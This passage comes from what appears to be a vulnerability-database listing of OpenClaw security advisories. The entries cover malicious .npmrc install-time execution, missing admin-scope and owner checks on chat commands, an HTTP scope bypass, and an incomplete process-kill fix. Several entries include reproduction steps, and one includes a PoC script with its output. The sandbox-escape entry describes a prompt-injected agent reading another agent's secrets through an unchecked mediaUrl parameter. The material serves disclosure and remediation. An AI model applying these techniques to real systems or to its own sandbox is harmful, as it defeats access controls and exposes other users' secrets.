install --omit=dev --silent --ignore-scripts inside the staged package directory, see src/infra/install-package-dir.ts:188-199. If that local package directory contains an attacker-controlled .npmrc, npm will still read it. If .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install. Who is impacted Users who run: openclaw plugins install <local path/archive> openclaw hooks install <local path/archive> And who install a malicious or untrusted local package that includes: a controlled .npmrc a git dependency a runnable attacker-controlled git target on that platform This should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code. The important distinction is: A normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges. This issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm still honors attacker-controlled project config from .npmrc. That means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present. Why this matters from a security perspective: It is install-time execution, not post-install trusted execution. The execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199. This occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense. It defeats an expected safety boundary. The code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer. But the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution. So the current mitigation is incomplete in a security-relevant way. The dangerous input is part of a supported user flow. OpenClaw explicitly supports installing plugins and hook packs from local directories and archives: src/cli/plugins-cli.ts:199-255 src/cli/hooks-cli.ts:573-676 That makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup. The issue is broader than plugin trust. The problem is not “plugins can do bad things once trusted.” The problem is “the installer consumes attacker-controlled package-manager config before trust is established.” That is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior. Hooks are affected too. The same installer path is used for hook packs, not only plugins. So this is a shared install-surface issue, not an isolated plugin-runtime concern. |
CVE-2026-35641
GHSA-m3mh-3mpg-37hw |
| VCID-bumq-54sb-6ua7 | OpenClaw: Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement > Fixed in OpenClaw 2026.3.24, the current shipping release. **Title** Mutating internal `/allowlist` chat commands missed `operator.admin` scope enforcement **CWE** CWE-862 Missing Authorization **CVSS v3.1** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N Base score: **6.5 (Medium)** **Severity Assessment** Medium. This is a real authorization flaw in OpenClaw’s internal control plane. The issue does not require host access, trusted local state tampering, or multi-tenant assumptions, but exploitation does require an already authenticated internal Gateway caller with `operator.write`. **Impact** An authenticated internal Gateway caller limited to `operator.write` can perform state-changing `/allowlist` actions without `operator.admin`, even though comparable mutating internal chat commands already require `operator.admin`. The reachable effects are persistent changes to config-backed `allowFrom` entries and pairing-store-backed allowlist entries. This is not a semantic-modeling complaint and not a generic “trusted operator can do things” claim. It is a missing authorization check inside OpenClaw’s own internal scope model, where peer mutating command surfaces already distinguish `operator.write` from `operator.admin`. **Affected Component** Verified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`. Exact vulnerable path on the shipped tag: - `src/auto-reply/reply/commands-allowlist.ts:251-254` - `/allowlist` authorization uses only `rejectUnauthorizedCommand(...)`. - `src/auto-reply/reply/commands-allowlist.ts:386-524` - mutating config and pairing-store writes happen here, but there is no `requireGatewayClientScopeForInternalChannel(..., operator.admin, ...)`. Reachability and scope model: - `src/gateway/method-scopes.ts:94-109` - `chat.send` is a write-scoped method. - `src/gateway/server.chat.gateway-server-chat.test.ts:539-559` - existing runtime coverage proves `chat.send` routes slash commands without an agent run. - `src/auto-reply/command-auth.ts:574-577` - internal callers become `senderIsOwner` only when `GatewayClientScopes` includes `operator.admin`. Comparable internal mutating command paths already enforce `operator.admin`: - `src/auto-reply/reply/commands-config.ts:64-73` - `src/auto-reply/reply/commands-mcp.ts:89-96` - `src/auto-reply/reply/commands-plugins.ts:387-394` - `src/auto-reply/reply/commands-acp.ts:98-106` Version history: - Introduced by commit `555b2578a8cc6e1b93f717496935ead97bfbed8b` (`feat: add /allowlist command`) - Earliest released affected tag found: `v2026.1.20` - Latest released affected tag verified: `v2026.3.23` **Technical Reproduction** 1. Check out the shipped release tag `v2026.3.23`. 2. Use an internal command context with: - `Provider = "webchat"` - `Surface = "webchat"` - `GatewayClientScopes = ["operator.write"]` - `params.command.channel = "webchat"` 3. Route a slash command through `chat.send`. 4. Execute either of these mutating commands: - `/allowlist add dm channel=telegram 789` - `/allowlist add dm --store channel=telegram 789` 5. Confirm the command context is authorized but not owner-equivalent: - `isAuthorizedSender === true` - `senderIsOwner === false` 6. Observe that the commands still succeed and perform persistent writes. **Demonstrated Impact** The vulnerable handler performs real state mutation for a low-scope internal caller: - Config-backed mutation path: - `src/auto-reply/reply/commands-allowlist.ts:398-503` - reads the config snapshot, applies the edit, validates, and writes the updated config to disk. - Store-backed mutation path: - `src/auto-reply/reply/commands-allowlist.ts:479-485` - `src/auto-reply/reply/commands-allowlist.ts:513-518` - updates the pairing-store allowlist without any admin-scope gate. The result is successful persistence, not just a misleading success message. **Environment** - Product: OpenClaw - Verified shipped tag: `v2026.3.23` - Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2` - Published GitHub release time: `2026-03-23T23:15:50Z` - Verification date: `2026-03-24` **Duplicate Check** This is not a duplicate of: - `GHSA-pjvx-rx66-r3fg` - that advisory covered cross-account scoping in `/allowlist ... --store`, not missing internal `operator.admin` enforcement. - `GHSA-hfpr-jhpq-x4rm` - that advisory covered `/config` writes through `chat.send`, not `/allowlist`. - `GHSA-3w6x-gv34-mqpf` - same authorization class, but different command path (`/acp`, not `/allowlist`). **In Scope Check** This report is in scope under `SECURITY.md` because: - it does **not** rely on adversarial operators sharing one gateway host or config; - it does **not** target the HTTP compatibility endpoints that `SECURITY.md` explicitly treats as full operator-access surfaces; - it demonstrates a real authorization mismatch inside OpenClaw’s own internal control-plane scope model (`operator.write` vs `operator.admin`); - peer mutating internal chat commands already enforce `operator.admin`, so this is not a request for a new boundary but a missing check on an existing one. This is therefore a concrete authorization bug, not a trusted-operator hardening suggestion. **Remediation Advice** 1. Add `requireGatewayClientScopeForInternalChannel(..., allowedScopes: ["operator.admin"], ...)` to the mutating internal `/allowlist` paths. 2. Add regression coverage for both mutation modes: - internal `operator.write` must be rejected; - internal `operator.admin` must be allowed. 3. Cover both config-backed and store-backed writes. 4. Audit other mutating internal chat-command paths for the same missing-scope pattern. |
GHSA-vqvg-86cc-cg83
|
| VCID-cvxu-rdbu-abd2 | OpenClaw has incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts` > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Advisory Details **Title**: Incomplete Fix for CVE-2026-27486: Unvalidated SIGKILL in `!stop` Chat Command via `shell-utils.ts` **Description**: ### Summary The `!stop` (and `/bash stop`) chat command kills background bash processes using `SIGKILL` directly, without first sending `SIGTERM` to allow graceful shutdown. This is because `bash-command.ts` imports `killProcessTree()` from `src/agents/shell-utils.ts`, which still contains the pre-CVE-2026-27486 aggressive kill logic, rather than from the patched `src/process/kill-tree.ts`. ### Details CVE-2026-27486 fixed unsafe process termination by introducing a graceful shutdown sequence in `src/process/kill-tree.ts` — sending `SIGTERM` first, waiting a configurable grace period (default 3 seconds), then escalating to `SIGKILL` only if the process is still alive. However, an identical copy of the **unpatched** `killProcessTree` function remains in `src/agents/shell-utils.ts` (lines 170–192). This function sends `SIGKILL` immediately with no `SIGTERM`: ```typescript // src/agents/shell-utils.ts:170-192 export function killProcessTree(pid: number): void { // ... Windows handling ... try { process.kill(-pid, "SIGKILL"); // Immediate hard kill, no SIGTERM } catch { try { process.kill(pid, "SIGKILL"); } catch { // process already dead } } } ``` The `!stop` chat command handler in `src/auto-reply/reply/bash-command.ts` imports and calls this vulnerable version at line 302: ```typescript // src/auto-reply/reply/bash-command.ts:5 import { killProcessTree } from "../../agents/shell-utils.js"; // src/auto-reply/reply/bash-command.ts:300-304 const pid = running.pid ?? running.child?.pid; if (pid) { killProcessTree(pid); // Calls the UNPATCHED version } markExited(running, null, "SIGKILL", "failed"); ``` Compare this to the patched version in `src/process/kill-tree.ts`: ```typescript // src/process/kill-tree.ts:46-78 function killProcessTreeUnix(pid: number, graceMs: number): void { // Step 1: Try graceful SIGTERM to process group try { process.kill(-pid, "SIGTERM"); } catch { /* ... */ } // Step 2: Wait grace period, then SIGKILL if still alive setTimeout(() => { if (isProcessAlive(-pid)) { try { process.kill(-pid, "SIGKILL"); } catch { /* ... */ } } }, graceMs).unref(); } ``` ### PoC This PoC demonstrates the difference between the vulnerable and patched code paths inside a running OpenClaw Gateway container. **Setup:** ```bash # Build and start the gateway container cd CVE-2026-27486-variant-exp/ docker compose up -d sleep 5 ``` **Exploit (vulnerable `killProcessTree` from `shell-utils.ts`):** The following script is injected into the container and executed. It starts a bash process that traps `SIGTERM` for graceful shutdown, then kills it using the same code path as `!stop`: ```javascript // exploit_sigkill.cjs — replicates src/agents/shell-utils.ts:183-190 const { spawn } = require('child_process'); const fs = require('fs'); try { fs.unlinkSync('/tmp/graceful_shutdown.txt'); } catch {} const child = spawn('/bin/bash', ['-c', 'trap \'echo GRACEFUL_SHUTDOWN > /tmp/graceful_shutdown.txt; exit 0\' SIGTERM; while true; do sleep 1; done' ], { detached: true, stdio: 'ignore' }); child.unref(); setTimeout(() => { // VULNERABLE: same as shell-utils.ts — SIGKILL only try { process.kill(-child.pid, 'SIGKILL'); } catch { try { process.kill(child.pid, 'SIGKILL'); } catch {} } setTimeout(() => { if (fs.existsSync('/tmp/graceful_shutdown.txt')) { console.log('[BLOCKED] SIGTERM was received.'); process.exit(1); } else { console.log('[EXPLOITED] SIGKILL sent directly — SIGTERM never delivered.'); process.exit(0); } }, 2000); }, 1000); ``` **Run:** ```bash python3 poc_exploit.py ``` ### Log of Evidence **Exploit output (SIGKILL only, no graceful shutdown):** ``` [*] Running exploit (vulnerable killProcessTree from shell-utils.ts)... [*] Victim PID: 78 [*] Calling vulnerable killProcessTree (SIGKILL only, no SIGTERM)... [EXPLOITED] SIGKILL sent directly — SIGTERM never delivered. [EXPLOITED] Graceful shutdown handler was NEVER invoked. [SUCCESS] CVE-2026-27486 variant confirmed: killProcessTree() in shell-utils.ts sends immediate SIGKILL, bypassing the graceful shutdown fix in process/kill-tree.ts. ``` **Control output (SIGTERM first, graceful shutdown works):** ``` [*] Running control (patched killProcessTree from process/kill-tree.ts)... [*] Victim PID: 93 [*] Calling patched killProcessTree (SIGTERM first, then SIGKILL after grace)... [NORMAL] SIGTERM received — graceful shutdown completed. Flag: GRACEFUL_SHUTDOWN [NORMAL] Control confirmed: patched killProcessTree sends SIGTERM first, allowing graceful shutdown before escalating to SIGKILL. ``` ### Impact When `!stop` is used, background processes are killed instantly via `SIGKILL` with no chance to perform cleanup. This can result in: - **Data corruption**: processes writing to files or databases are interrupted mid-write - **Resource leaks**: temporary files, lock files, and network connections are not properly released - **Security-sensitive cleanup skipped**: operations like erasing in-memory secrets or completing audit logs are bypassed This is the same class of impact that CVE-2026-27486 was filed for — the fix simply missed the `shell-utils.ts` copy of the function. ### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.3.14 - **Patched versions**: <None> ### Severity - **Severity**: Medium - **Vector string**: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H ### Weaknesses - **CWE**: CWE-404: Improper Resource Shutdown or Release ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192](https://github.com/moltbot/moltbot/blob/f2849c2417/src/agents/shell-utils.ts#L170-L192) | The vulnerable `killProcessTree` function that sends immediate `SIGKILL` without `SIGTERM`. | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L5) | Import statement pulling the vulnerable `killProcessTree` from `shell-utils.ts` instead of the patched `kill-tree.ts`. | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304](https://github.com/moltbot/moltbot/blob/f2849c2417/src/auto-reply/reply/bash-command.ts#L300-L304) | The `!stop` handler calling the vulnerable `killProcessTree(pid)`. | | [https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78](https://github.com/moltbot/moltbot/blob/f2849c2417/src/process/kill-tree.ts#L46-L78) | The **patched** `killProcessTreeUnix` with graceful `SIGTERM` → grace period → `SIGKILL` sequence (for reference). | |
CVE-2026-35667
GHSA-3298-56p6-rpw2 |
| VCID-d3qp-5wm9-aqfp | OpenClaw has Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22) > Fixed in OpenClaw 2026.3.24, the current shipping release. ### Advisory Details **Title**: Sandbox Media Root Bypass via Unnormalized `mediaUrl` / `fileUrl` Parameter Keys (CWE-22) **Description**: ### Summary A path traversal vulnerability in the agent sandbox enforcement allows a sandboxed agent to read arbitrary files from other agents' workspaces by using the `mediaUrl` or `fileUrl` parameter key in message tool calls. The `normalizeSandboxMediaParams` function only checks `["media", "path", "filePath"]` keys, while `mediaUrl` and `fileUrl` escape normalization entirely. Combined with `handlePluginAction` dropping `mediaLocalRoots` from the dispatch context, this enables a full sandbox escape where any agent can read files outside its designated sandbox root. ### Details The vulnerability exists in two files within the messaging pipeline: **1. Incomplete parameter key coverage in `normalizeSandboxMediaParams`:** In `src/infra/outbound/message-action-params.ts`, the function iterates over a hardcoded allowlist of parameter keys to validate: ```typescript // Line 212 const mediaKeys: Array<"media" | "path" | "filePath"> = ["media", "path", "filePath"]; ``` The `mediaUrl` and `fileUrl` parameter keys are not included in this array. These keys are actively used by multiple channel extensions (Discord, Telegram, Slack, Matrix, Twitch) for media attachment handling, but they completely bypass the sandbox path validation performed by `resolveSandboxedMediaSource`. **2. Dropped `mediaLocalRoots` in `handlePluginAction`:** In `src/infra/outbound/message-action-runner.ts`, the `handlePluginAction` function dispatches actions to channel plugins but omits `mediaLocalRoots` from the context: ```typescript // Lines 684-697 const handled = await dispatchChannelMessageAction({ channel, action, cfg, params, accountId: accountId ?? undefined, requesterSenderId: input.requesterSenderId ?? undefined, sessionKey: input.sessionKey, sessionId: input.sessionId, agentId, gateway, toolContext: input.toolContext, dryRun, // mediaLocalRoots is MISSING here }); ``` Despite `ChannelMessageActionContext` defining `mediaLocalRoots?: readonly string[]` (in `src/channels/plugins/types.core.ts` line 478), plugins receive `undefined` and fall back to `getDefaultMediaLocalRoots()`, which permits reads of the entire `~/.openclaw/` directory tree — including all agents' workspaces. **Attack chain:** 1. A sandboxed agent (Agent-A at `~/.openclaw/workspace/agent-a/`) calls the message tool with `{ mediaUrl: "~/.openclaw/workspace/agent-b/secret.txt" }` 2. `normalizeSandboxMediaParams` skips the `mediaUrl` key (not in allowlist) 3. `handlePluginAction` dispatches without `mediaLocalRoots` 4. Plugin calls `loadWebMedia` with default roots, which allows `~/.openclaw/workspace/**` 5. Agent-B's secret file content is read and sent as a channel attachment ### PoC **Prerequisites:** - Docker installed - OpenClaw Docker image built (`openclaw-gateway:latest`) **Steps:** 1. Start the vulnerable gateway container: ```bash cd llm-enhance/cve-finding/Path_Traversal/CVE-2026-27522-Media_Root_Bypass-variant-exp/ docker compose up -d sleep 5 ``` 2. Run the exploit: ```bash python3 poc_exploit.py ``` 3. The exploit writes a secret file to `~/.openclaw/workspace/agent-b/secret_key.txt` inside the container, then invokes `normalizeSandboxMediaParams` with Agent-A's sandbox policy and `{ mediaUrl: <agent-b-secret-path> }`. The `mediaUrl` key bypasses normalization, and `loadWebMedia` reads the file successfully. 4. Run the control experiment to confirm sandbox works for checked keys: ```bash python3 control-sandbox_enforced.py ``` ### Log of Evidence **Exploit output:** ``` === CVE-2026-27522 Variant: Sandbox Media Root Bypass === [*] Container 'openclaw-media-bypass-test' is running [*] Running exploit script with Bun... [VULNERABLE] mediaUrl bypassed normalizeSandboxMediaParams! Agent-A sandboxRoot: /root/.openclaw/workspace/agent-a mediaUrl targets Agent-B: /root/.openclaw/workspace/agent-b/secret_key.txt args after normalization: {"mediaUrl":"/root/.openclaw/workspace/agent-b/secret_key.txt"} [EXPLOITED] Agent-B secret file content: AGENT-B-SECRET-API-KEY-sk-12345abcdef === EXPLOIT SUCCESSFUL === Agent-A read Agent-B's secret file via mediaUrl, bypassing sandbox. [+] RESULT: VULNERABLE — mediaUrl bypasses sandbox enforcement ``` **Control experiment output:** ``` === Control Experiment: Sandbox Enforcement for 'media' Key === [*] Container 'openclaw-media-bypass-test' is running [*] Running control script with Bun... [SAFE] normalizeSandboxMediaParams blocked 'media' key as expected! Error: Path escapes sandbox root (/tmp/sandbox-ZKvGQX): /tmp/victim-2cuAOO/secret.txt === CONTROL EXPERIMENT PASSED === The 'media' parameter IS correctly checked by sandbox enforcement. Only unchecked keys (mediaUrl, fileUrl) bypass the sandbox. [+] CONTROL PASSED: 'media' key is correctly enforced by sandbox ``` ### Impact This is a **sandbox escape** vulnerability. An attacker who can influence an agent's tool calls (via prompt injection, multi-agent interaction, or malicious plugin instruction) can read arbitrary files from other agents' workspaces. This includes: - API keys and secrets stored in other agents' sandboxes - Session data and conversation logs - Configuration files with sensitive credentials - Any file within the `~/.openclaw/` directory tree This completely defeats the purpose of the multi-agent sandbox isolation feature, which is documented as a security boundary in the project's Docker and sandboxing documentation. ### Affected products - **Ecosystem**: npm - **Package name**: openclaw - **Affected versions**: <= 2026.3.14 (current latest) - **Patched versions**: <None> ### Severity - **Severity**: High - **Vector string**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N ### Weaknesses - **CWE**: CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ### Occurrences | Permalink | Description | | :--- | :--- | | [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-params.ts#L206-L227) | The `normalizeSandboxMediaParams` function with incomplete `mediaKeys` allowlist — `mediaUrl` and `fileUrl` are not checked. | | [https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697](https://github.com/moltbot/moltbot/blob/main/src/infra/outbound/message-action-runner.ts#L684-L697) | The `handlePluginAction` dispatch call that omits `mediaLocalRoots` from the context passed to `dispatchChannelMessageAction`. | | [https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478](https://github.com/moltbot/moltbot/blob/main/src/channels/plugins/types.core.ts#L478) | The `ChannelMessageActionContext` type that defines `mediaLocalRoots` but never receives it from `handlePluginAction`. | |
CVE-2026-35668
GHSA-hr5v-j9h9-xjhg |
| VCID-j96c-kau3-7fag | OpenClaw: Non-owner command-authorized sender can change the owner-only `/send` session delivery policy > Fixed in OpenClaw 2026.3.24, the current shipping release. **Title** Non-owner command-authorized sender can change the owner-only `/send` session delivery policy **CWE** CWE-285 Improper Authorization **CVSS v3.1** CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L Base score: **5.4 (Medium)** **Severity Assessment** Medium. This is a real owner-only authorization bypass, but the demonstrated impact is limited to persistent mutation of the current session’s delivery policy rather than direct code execution, sandbox escape, or cross-host compromise. **Impact** A non-owner sender who is allowed to run commands can invoke `/send on|off|inherit` and persistently change the current session’s `sendPolicy`, even though OpenClaw documents `/send` as owner-only. That lets a lower-trust participant: - disable reply delivery for the current session (`/send off`), suppressing future replies in that chat; - re-enable reply delivery (`/send on`) after the owner intentionally disabled it; - remove the session override (`/send inherit`). **Affected Component** Verified against the latest published GitHub release tag `v2026.3.23` (`ccfeecb6887cd97937e33a71877ad512741e82b2`), published `2026-03-23T23:15:50Z`. Exact vulnerable path on the shipped tag: - `src/auto-reply/reply/commands-session.ts:212-239` - `handleSendPolicyCommand(...)` checks only `params.command.isAuthorizedSender`. - when true, it mutates `params.sessionEntry.sendPolicy` and persists the session entry. Authorization behavior that makes this reachable: - `src/auto-reply/command-auth.ts:401-407` - `senderIsOwner` is computed separately from general command authorization. - `src/auto-reply/command-auth.ts:420-429` - command authorization can succeed even when `senderIsOwner === false`. - `src/auto-reply/command-auth.owner-default.test.ts:10-47` - existing coverage confirms a sender can be command-authorized while not treated as owner. Documented owner-only contract: - `docs/tools/slash-commands.md:112` - `/send on|off|inherit` is documented as owner-only. - `docs/concepts/session-tool.md:156` - `sendPolicy` is documented as settable via `sessions.patch` or owner-only `/send on|off|inherit`. Related privilege model: - `src/gateway/method-scopes.ts:131-133` - `sessions.patch` is admin-scoped, which reinforces that session-delivery-policy mutation is treated as privileged state. Version history: - The vulnerable handler exists in release history going back at least to commit `ea018a68ccb92dbc735bc1df9880d5c95c63ca35` (`refactor(auto-reply): split reply pipeline`). - Earliest released affected tag found: `v2026.1.14-1` - Latest released affected tag verified: `v2026.3.23` **Technical Reproduction** 1. Check out the shipped release tag `v2026.3.23`. 2. Configure a channel where: - a non-owner sender is allowed to run commands, for example through `commands.allowFrom`; - the owner identity is distinct, for example via `commands.ownerAllowFrom`. 3. Start or reuse a session with a live `sessionEntry` and `sessionStore`. 4. Send `/send off` as the non-owner but command-authorized sender. 5. Confirm the resolved command context has: - `isAuthorizedSender === true` - `senderIsOwner === false` 6. Observe that the handler still accepts the command, mutates `sessionEntry.sendPolicy`, and persists the session entry. **Demonstrated Impact** The vulnerable handler performs a real persistent session-state change: - `src/auto-reply/reply/commands-session.ts:232-238` - `/send inherit` deletes `sessionEntry.sendPolicy` - other modes assign `sessionEntry.sendPolicy = sendPolicyCommand.mode` - the handler then calls `persistSessionEntry(params)` The mutation is not gated by owner status, only by general command authorization. That changes subsequent delivery behavior for the current session, which matches the documented meaning of `sendPolicy`. **Environment** - Product: OpenClaw - Verified shipped tag: `v2026.3.23` - Shipped tag commit: `ccfeecb6887cd97937e33a71877ad512741e82b2` - Published GitHub release time: `2026-03-23T23:15:50Z` - Verification date: `2026-03-24` **Duplicate Check** Upon inspection there is no preexisting GHSA for `/send`. This is distinct from: - `GHSA-r7vr-gr74-94p8` - that advisory covered owner-only authorization bypasses for `/config` and `/debug`, not `/send`. This is the same authorization class, but a different privileged command surface that still lacks the owner check. **In Scope Check** This report is in scope under `SECURITY.md` because: - it does **not** rely on adversarial operators sharing one gateway host or config; - it does **not** rely on trusted local state tampering; - `SECURITY.md:151-152` explicitly says non-owner sender status matters for owner-only tools and commands; - `/send` is explicitly documented as owner-only, so this is a direct owner-only authorization bypass, not a complaint about normal shared-agent steering. This is therefore a concrete authorization flaw against a documented product boundary. **Remediation Advice** 1. Change `/send` to require owner status, not just command authorization. 2. Reuse the same owner-only rejection pattern already used by privileged command surfaces such as `/config`, `/debug`, and owner-only `/plugins` writes. 3. Add regression coverage for the exact case where: - a non-owner sender is command-authorized; - `/send` must still be rejected unless `senderIsOwner === true`. 4. Verify that the owner can still use `/send on|off|inherit` normally. |
CVE-2026-35620
GHSA-39mp-545q-w789 |
| VCID-jhah-j2td-t3dp | OpenClaw Has Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Summary Incomplete Fix for CVE-2026-4039: CLI Backend Environment Variable Injection via Workspace Config ## Current Maintainer Triage - Status: open - Normalized severity: high - Assessment: Real shipped malicious-workspace-config env injection in the CLI backend runner, fixed by sanitizing backend env before spawn and shipped in v2026.3.24, so advisory stays open until published. ## Affected Packages / Versions - Package: `openclaw` (npm) - Latest published npm version: `2026.3.31` - Vulnerable version range: `<=2026.3.23-2` - Patched versions: `>= 2026.3.24` - First stable tag containing the fix: `v2026.3.24` ## Fix Commit(s) - `c2fb7f1948c3226732a630256b5179a60664ec24` — 2026-03-24T12:58:10-07:00 ## Release Process Note - The fix is already present in released version `2026.3.24`. - This draft looks ready for final maintainer disposition or publication, not additional code-fix work. Thanks @YLChen-007 for reporting. |
CVE-2026-41384
GHSA-vfw7-6rhc-6xxg |
| VCID-nfva-pukn-uqch | OpenClaw has a Gateway HTTP /v1/models Route Bypasses Operator Read Scope > Fixed in OpenClaw 2026.3.24, the current shipping release. ## Summary The OpenAI-compatible HTTP endpoint `/v1/models` accepts bearer auth but does not enforce operator method scopes. In contrast, the WebSocket RPC path enforces `operator.read` for `models.list`. A caller connected with `operator.approvals` (no read scope) is rejected for `models.list` (`missing scope: operator.read`) but can still enumerate model metadata through HTTP `/v1/models`. Confirmed on current `main` at commit `06de515b6c42816b62ec752e1c221cab67b38501`. ## Details The WS control-plane path enforces role/scope checks centrally before dispatching methods. For non-admin operators, this includes required method scopes such as `operator.read` for `models.list`. The HTTP compatibility path for `/v1/models` performs bearer authorization and then returns model metadata; it does not apply an equivalent scope check. As reproduced, a caller with only `operator.approvals` can: 1. connect successfully, 2. fail `models.list` over WS with `missing scope: operator.read`, 3. fetch `/v1/models` over HTTP with status 200 and model data. This is a cross-surface authorization inconsistency where the stricter WS policy can be bypassed via HTTP. ## Impact - Callers lacking `operator.read` can still enumerate gateway model metadata through HTTP compatibility routes. - Breaks scope model consistency between WS RPC and HTTP surfaces. - Weakens least-privilege expectations for operators granted non-read scopes. ## Patch Suggestion ### 1) Enforce read scope on `/v1/models` routes Apply a scope gate equivalent to `models.list` before serving `/v1/models` or `/v1/models/:id`. ### 2) Reuse centralized scope-authorization helper for HTTP compatibility endpoints Use the same operator scope logic used by WS dispatch (`authorizeOperatorScopesForMethod(...)`) to prevent policy drift. ### 3) Add regression tests Keep this PoC and add explicit negative/positive controls: - `operator.approvals` without read is rejected on HTTP `/v1/models`. - `operator.read` is accepted on both WS `models.list` and HTTP `/v1/models`. ## Credit Reported by @zpbrent. |
CVE-2026-35619
GHSA-68f8-9mhj-h2mp |
| VCID-pa1f-qzsh-efa9 | OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send > Fixed in OpenClaw 2026.3.24, the current shipping release. ## Summary The shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`. This is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind. ## Details The gateway's documented scope split is clear: - `chat.send` is a write-scoped action. - direct config mutation is an admin-scoped action. The vulnerable path is: 1. A gateway client authenticates with `operator.write`. 2. The client calls `chat.send`, which is intentionally allowed for that scope. 3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline. 4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured. 5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path. 6. The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`. 7. No sink-side check requires `operator.admin` before the persistent write occurs. That creates a direct control-plane mismatch: - `config.patch` rejects the same caller with `missing scope: operator.admin`. - `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state. ## Impact - A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy. - The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing. - This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation. ## Remediation ### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist` Mirror the existing hardened pattern from `/config` and `/plugins`. Before any config-backed `/allowlist add|remove` write, require: - `operator.admin` for internal gateway channels This should happen before `plugin.allowlist.applyConfigEdit(...)` and before `writeConfigFile(...)`. ### 2) Keep Pairing-Store and Config-Write Policy Checks, but Do Not Treat Them as Scope Enforcement `configWrites` policy and pairing-store behavior are useful secondary controls, but they do not replace the missing privilege check between `operator.write` and `operator.admin`. |
CVE-2026-35621
GHSA-94pw-c6m8-p9p9 |